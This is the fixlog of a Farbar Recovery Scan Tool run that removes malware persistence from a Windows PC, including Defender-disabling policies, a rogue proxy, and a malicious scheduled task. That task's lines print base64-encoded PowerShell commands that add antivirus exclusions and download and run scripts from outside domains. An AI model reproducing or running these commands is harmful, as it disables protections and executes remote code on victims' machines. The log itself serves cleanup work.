Fix result of Farbar Recovery Scan Tool (x64) Version: 28-03-2026
Ran by Admin (01-04-2026 11:26:41) Run:1
Running from E:\Software Apps and Tools\Farbar Scanner Tool (FRST)
Loaded Profiles: Admin
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
SystemRestore: On
CreateRestorePoint:
HKLM\...\Run: [hrvbs] => c:\windows\h.vbs [92 2025-12-17] () [File not signed]
HKLM\...\Policies\Explorer: [SettingsPageVisibility] hide:network-proxy <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (No File)
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(1): schtasks -> /run /tn \SystemResourcesUpdaterLegacy-g76sn8 <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(2): powershell -> -NoProfile -EncodedCommand IwAgADUAMwBjADYAYQA2AGQAOQAtADIAOQBjAGMALQA0ADEAOABiAC0AYQAxADYAZQAtAGIAYQAyAGIAZAAxAGYAYgA2AGUAMgBmAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAUABJAEQAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACAALQBGAG8AcgBjAGUA <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(3): powershell -> -NoProfile -EncodedCommand IwAgADEAYQBhADAAMQBlADMAYQAtADAANABhAGIALQA0ADYAZQA0AC0AYgBkADUANwAtAGIANQBiADgAYQA2ADYAMwBhAGYAZQBiAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAgAC0ARgBvAHIAYwBlAA== <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(4): powershell -> -NoProfile -EncodedCommand IwAgADUAYwBmADYAYwBmADgAMAAtADkANwBiAGUALQA0ADcAZgA5AC0AYQBmADEANAAtADYAMABiADAAYQAwADkAMwA4ADMANgBiAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAGYAcgBlAHMAaABzAHQAbwBuAGUAcwAuAG8AcgBnACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(5): powershell -> -NoProfile -EncodedCommand IwAgAGEAMgAxADcAYgBiAGEAMAAtADIAZAA0ADYALQA0ADUAYgBhAC0AYgA4ADUANAAtAGYAYwA2ADkAMABhADcAZABiADIAOAAzAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHEAdQBpAGUAdABzAGcAYQByAGQAZQBuAHMALgBjAG8AbQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4A <==== ATTENTION
ManualProxies: 1127.0.0.1:58128 <==== ATTENTION
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
DisableService: AdvancedSystemCareService19
S3 cpuz154; \??\C:\WINDOWS\temp\cpuz154\cpuz154_x64.sys [X] <==== ATTENTION
ContextMenuHandlers1_S-1-5-21-805122580-2970808790-2044927905-1001: [          kwpsshellext] -> {28A80003-18FD-411D-B0A3-3C81F618E22B} => C:\Users\Admin\AppData\Local\Kingsoft\WPS Office\11.2.0.11042\office6\kwpsmenushellext64.dll -> No File
ContextMenuHandlers4_S-1-5-21-805122580-2970808790-2044927905-1001: [          kwpsshellext] -> {28A80003-18FD-411D-B0A3-3C81F618E22B} => C:\Users\Admin\AppData\Local\Kingsoft\WPS Office\11.2.0.11042\office6\kwpsmenushellext64.dll -> No File
FirewallRules: [{a019d323-5ec6-44ab-a0e1-0022e742d03e}] => (Allow) C:\Users\Admin\1\Microsoft_Entra_Password_Protection.exe => No File
FirewallRules: [{532d2282-458a-447a-9f0a-8cb154ee51c2}] => (Allow) C:\Users\1\Microsoft_Entra_Password_Protection.exe => No File
Reboot:
*****************

Processes closed successfully.
SystemRestore: On => completed
Restore point was successfully created.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\hrvbs" => removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\SettingsPageVisibility" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows Defender\\DisableAntiSpyware => Error setting value.
HKLM\SOFTWARE\Microsoft\Windows Defender\\DisableAntiVirus => Error setting value.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully

"C:\WINDOWS\system32\GroupPolicy\User" Folder move:

C:\WINDOWS\system32\GroupPolicy\User => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F3E6E7ED-A196-4E44-8803-55FAB3AD4E29}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F3E6E7ED-A196-4E44-8803-55FAB3AD4E29}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6DF52669-C418-4948-AD08-5C9167C6B131}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DF52669-C418-4948-AD08-5C9167C6B131}" => removed successfully
C:\WINDOWS\System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemResourcesUpdaterLegacy-g76sn8" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DF52669-C418-4948-AD08-5C9167C6B131}" => not found
"C:\WINDOWS\System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DF52669-C418-4948-AD08-5C9167C6B131}" => not found
"C:\WINDOWS\System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DF52669-C418-4948-AD08-5C9167C6B131}" => not found
"C:\WINDOWS\System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DF52669-C418-4948-AD08-5C9167C6B131}" => not found
"C:\WINDOWS\System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemResourcesUpdaterLegacy-g76sn8" => not found
"HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\" => removed successfully
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => removed successfully
AdvancedSystemCareService19 => service was disabled
HKLM\System\CurrentControlSet\Services\cpuz154 => removed successfully
cpuz154 => service removed successfully
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\Software\Classes\*\ShellEx\ContextMenuHandlers\          kwpsshellext => removed successfully
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\SOFTWARE\Classes\CLSID\{28A80003-18FD-411D-B0A3-3C81F618E22B} => removed successfully
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\Software\Classes\Directory\ShellEx\ContextMenuHandlers\          kwpsshellext => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{a019d323-5ec6-44ab-a0e1-0022e742d03e}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{532d2282-458a-447a-9f0a-8cb154ee51c2}" => removed successfully


The system needed a reboot.

==== End of Fixlog 11:30:34 ====